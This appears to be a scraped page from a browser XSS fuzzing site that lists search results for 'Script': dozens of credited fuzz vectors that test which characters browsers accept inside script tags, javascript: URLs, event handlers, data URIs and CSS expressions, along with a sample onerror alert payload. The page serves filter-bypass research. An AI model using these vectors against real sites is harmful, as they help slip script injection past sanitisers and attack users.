Featured vector
Firefox 0.0
<!-- sample vector --> <0x3cimg src='about:blank' onerror=alert(1)>
<!-- sample vector --> <0x3cimg src='about:blank' onerror=alert(1)>
Fuzz vector cloud
Anchor Attributes CSS Closing Comments HTML HTML5 JavaScript Protocol Script URL XSS attribute bla bypass challenge char comment data encoding entities entity event events expression flash for fun handler href img innerHTML navigateURL onload prompt properties regex space src string strings style svg tag tags test testing uri waf xml
3,344,426 Successful fuzzes
Fuzz Vectors
Searching for "Script"
Your browser identified asGeneral Crawlers unknown
All vectors
| Description | Vector | Created by |
|---|---|---|
| script param separator | <script x=x*chr*src=data:,logChr(*num*)></script> | @i_bo0om |
| Comma analog in script src data | <script src=data:*chr*logChr(*num*)></script> | @i_bo0om |
| Characters that eat JavaScript regex escapes | <script> var regexChars = /*chr*\$/g if(!("*chr*$".match(regexChars))) { logChr(*num*) } </script> | @tifkin_ |
| Characters that modify JavaScript regex character classes | <script> var regexChars = /[*chr*.]/g if(!(".".match(regexChars))) { logChr(*num*) } <script> | @tifkin_ |
| Characters ignored in Javascript function call with unicode 2 | <script>l\*chr*u006fg(*num*)</script> | @garethheyes |
| Characters ignored in Javascript function call with unicode | <script>l\u006f*chr*g(*num*)</script> | @garethheyes |
| Characters that end script tags | <script*chr*test>logChr(*num*)</script> | @JohnathanKuskos |
| Characters that separate JavaScript object key and value | <script> var obj = {"foo"*chr*"bar"}; logChr(*num*) </script> | @peksa |
| Characters that start JavaScript double quote strings | <script> *chr*"; logChr(*num*) </script> | @peksa |
| script var separator | <script> var a = "olol123*chr* <logChr(*num*)// </script> | @i_bo0om |
| Characters that separate JavaScript assignment statements | <script> var a={}*chr*b={}&logChr(*num*); </script> | @Giutro |
| Characters that allow a new statement to begin2 | <script> var a={}*chr*b=logChr(*num*); </script> | @tifkin_ |
| Characters that allow a new statement to begin | <script> var a={}*chr*logChr(*num*); </script> | @tifkin_ |
| Characters that can be used to terminate entities in an href | <a href="javascript&colon*chr*log(*num*)" id="fuzzelement*num*">test</a> | @tifkin_ |
| Characters to break VBScript comments | <script language="vbscript"> '*chr*log(*num*)' </script> | @0x6D6172696F |
| Characters that make a double quote valid | <script> *chr*"; logChr(*num*); </script> | @tifkin_ |
| Characters allowed after domain | <a href="http://google.com*chr*breakme" id="fuzzelement*num*">test</a> | @avlidienbrunn |
| Characters allowed before http | <a href="http://*chr*google.com" id="fuzzelement*num*">test</a> | @avlidienbrunn |
| Characters allowed to hex encodings of javascript variables | <script> lo\u*chr*0067Chr(*num*); </script> | @tifkin_ |
| Characters allowed to hex encode javascript | <script> lo\*chr*0067Chr(*num*); </script> | @tifkin_ |
| Characters allowed before script tag name | <*chr*script> logChr(*num*) </script> | @tifkin_ |
| Characters not encoded with encodeURIComponent | <script> chr=String.fromCharCode(*num*); result=''; try{ result=encodeURIComponent(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(*num*); } </script> | @garethheyes |
| Characters not encoded with encodeURI | <script> chr=String.fromCharCode(*num*); result=''; try{ result=encodeURI(chr); }catch(e){} if(!/%/.test(result)&&result.length) { ids.push(*num*); } </script> | @garethheyes |
| SVG script | <svg><script*chr*>logChr(*num*)</script></svg> | @garethheyes |
| JS Property check middle character | <img src=xx:xx onerror=window[['log*chr*Chr']](*num*)> | @garethheyes |
| JS Property check ending character | <img src=xx:xx onerror=window[['logChr*chr*']](*num*)> | @garethheyes |
| Characters allowed before slashes no protocol | <a href="*chr*//google.com" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters allowed inside slashes no protocol | <a href="/*chr*/google.com" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters allowed instead of slash 2 | <a href="http:*chr**chr*google.com" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters allowed instead of slash | <a href="http:*chr*google.com" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters allowed after slash | <a href="http:/*chr*/google.com" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters allowed inside http | <a href="ht*chr*tp://google.com" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters allowed instead of forward slash in url | <a href="*chr**chr*google.com" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters allowed instead of colon in js url | <a href="javascript*chr*alert(1)" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters allowed as vbscript variables | <img src=x:xx onerror="try {execScript('*chr*=1','vbs');log(*num*);}catch(e){}"> | @garethheyes |
| Replacement for s in script tag | <*chr*cript>logChr(*num*)</script> | @blubbfiction |
| Characters inside script tag name | <scr*chr*ipt>logChr(*num*)</script> | @blubbfiction |
| Entities allowed instead of colon for js protocol | htmlStr = '<a href="javascript'+*dataentities*+'123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; | @peksa |
| Entities allowed after js protocol | htmlStr = '<a href="javascript'+*dataentities*+':123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; | @garethheyes |
| Entities allowed before js protocol | htmlStr = '<a href="'+*dataentities*+'javascript:123">test</a>'; document.getElementById('placeholder').innerHTML = htmlStr; try { if(document.getElementById('placeholder').firstChild.protocol === 'javascript:') { customLog(*dataentities*); } }catch(e){}; | @garethheyes |
| Character allowed after the slash for end script tag | <script>alert(logChr(*num*))</*chr*script> | @MisterJyu |
| Character allowed before the slash for end script tag | <script>alert(logChr(*num*))<*chr*/script> | @MisterJyu |
| Characters that break out of script variables | <script>x='<*chr*script><img src=xx:xx onerror=logChr(*num*)>';</script> | @garethheyes |
| Characters that are spaces | <img src=xx:xx onerror="*num*<=0xffff&&/./.test('*uni*')&&/\s/.test('*uni*')&&logChr(*num*)"> | @garethheyes |
| Characters that are new lines | <img src=xx:xx onerror="!/./.test('*uni*')&&/\s/.test('*uni*')&&logChr(*num*)"> | @garethheyes |
| Determine what character can be at the end of the javascript but before the colon | <!-- sample vector --> <img src=xx:xx *chr*onerror=logChr(*num*)> <a href=javascript*chr*:alert(*num*)>*num*</a> | @MisterJyu |
| Characters to end script tag via JavaScript regex 002 | <script>log(*num*,1</script*chr*//)</script> | @0x6D6172696F |
| Characters to end script tag via JavaScript regex 001 | <script>log(*num*,1</script*chr*/)</script> | @0x6D6172696F |
| Iframe contentDocument properties | <iframe src="http://businessinfo.co.uk" id="iframe"></iframe> <script> window.addEventListener('load', function(){ props=props.concat(Object.getOwnPropertyNames(document)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ try{ if(document.getElementById('iframe').contentDocument[arguments[0]])customLog(arguments[0]); }catch(e){}; }) }, false); </script> | @garethheyes |
| Iframe contentWindow properties | <iframe src="http://businessinfo.co.uk" id="iframe"></iframe> <script> window.addEventListener('load', function(){ props=props.concat(Object.getOwnPropertyNames(document)); for(var i=-100;i<100;i++) { props.push(i); } props.forEach(function(){ try{ if(document.getElementById('iframe').contentWindow[arguments[0]])customLog(arguments[0]); }catch(e){}; }) }, false); </script> | @garethheyes |
| Characters eating backslash in javascript string 2 | <script>if("x\*chr*".length==2) { log(*num*);}</script> | @mhswende |
| Characters eating backslash in javascript string | <script>if("x\*chr*".length==1) { log(*num*);}</script> | @mhswende |
| Characters ignored inside javascript string v2 | <script>if("x*chr*x" == "xx") { log(*num*);}</script> | @mhswende |
| Characters ignored in html event handler name | <img src=x on*chr*Error="javascript:log(*num*)"/> | @mhswende |
| Characters ignored in Javascript function call | "`'><script>lo*chr*g(*num*)</script> | @mhswende |
| Uncode sequences generating illegitimate ASCII | <script> "\ud83d\u*hex4*".match(/.*<.*/) ? log(*num*) : null; </script> | @0x6D6172696F |
| Characters allowed after ampersand in named character references | <a href="javascript&*chr*colon;log(*num*)" id="fuzzelement*num*">test</a> | @_cweb |
| Characters consuming backslashes and breaking JS strings | <script>a='abc\*chr*\';log(*num*)//def';</script> | @0x6D6172696F |
| Does this browser support e4x | <script>try{eval("<></>");logBoolean(1)}catch(e){logBoolean(0)};</script> | @garethheyes |
| Characters allowed after script | <script*chr*>log(*num*)</script> | @garethheyes |
| determine what characters can be inside a script tag | "`'><sc*chr*ript>log(*num*)</sc*chr*ript> | @MisterJyu |
| Characters escaping JS comment delimiters 001 | <script>/* **chr*/log(*num*)// */</script> | @0x6D6172696F |
| Characters breaking CSS strings allowing expression | "'`>ABC<div style="font-family:'foo*chr*;x:expression(log(*num*));/*';">DEF | @0x6D6172696F |
| Characters ending CSS values allowing expressions | "'`>ABC<div style="font-family:'foo'*chr*x:expression(log(*num*));/*';">DEF | @0x6D6172696F |
| Characters breaking JavaScript Regex delimiter | "'`><script>a=/hello;*chr*;i=0;log(*num*);a/i;</script> | @0x6D6172696F |
| Characters in script inside XML elements 004 | "'`><p><svg><script>a='hello*chr*;log(*num*)//';</script></p> | @0x6D6172696F |
| Characters in script inside XML elements 003 | <p><svg><script>*chr*og(*num*)</script></p> | @0x6D6172696F |
| Characters in script inside XML elements 002 | <p><svg><script>l*chr*og(*num*)</script></p> | @0x6D6172696F |
| Characters in script inside XML elements 001 | <p><svg><script>*chr*log(*num*)</script></p> | @0x6D6172696F |
| Character between lt and slash in closing tag | <script>log(*num*)<*chr*/script> | @shafigullin |
| Characters allowed for padding in a VBS URI 002 | <iframe src="vbscript:log*chr**num*"></iframe> | @0x6D6172696F |
| Characters allowed for padding in a VBS URI 001 | <iframe src="vbs:log*chr**num*"></iframe> | @0x6D6172696F |
| Characters allowed for padding in a data URI 003 | <script src="data:text/plain*chr*log(*num*)"></script> | @0x6D6172696F |
| Characters allowed for padding in a data URI 002 | <script src="data:*chr*,log(*num*)"></script> | @0x6D6172696F |
| Characters allowed for padding in a data URI 001 | <script src="data:text/plain,lo*chr*g(*num*)"></script> | @0x6D6172696F |
| Characters before paren in Javascript call | "'`><script>log*chr*(*num*)</script> | @garethheyes |
| Characters before img | "'`><*chr*img src=xxx:x onerror=log(*num*)> | @garethheyes |
| Characters before script | '`"><*chr*script>log(*num*)</script> | @garethheyes |
| Characters in between protocol in js url | <a href="javas*chr*cript:alert(1)" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters that close JS Comments | '"`><script>/* **chr*log(*num*)// */</script> | @garethheyes |
| Characters allowed before protocol in js url | <a href="*chr*javascript:alert(1)" id="fuzzelement*num*">test</a> | @garethheyes |
| Characters allowed before colon in js url | <a href="javascript*chr*:alert(1)" id="fuzzelement*num*">test</a> | @garethheyes |
| NULL Characters inside JavaScript properties | `'"><script>window['log*chr*'](*num*)</script> | @garethheyes |
| Characters allowed before a JavaScript function | "`'><script>*chr*log(*num*)</script> | @garethheyes |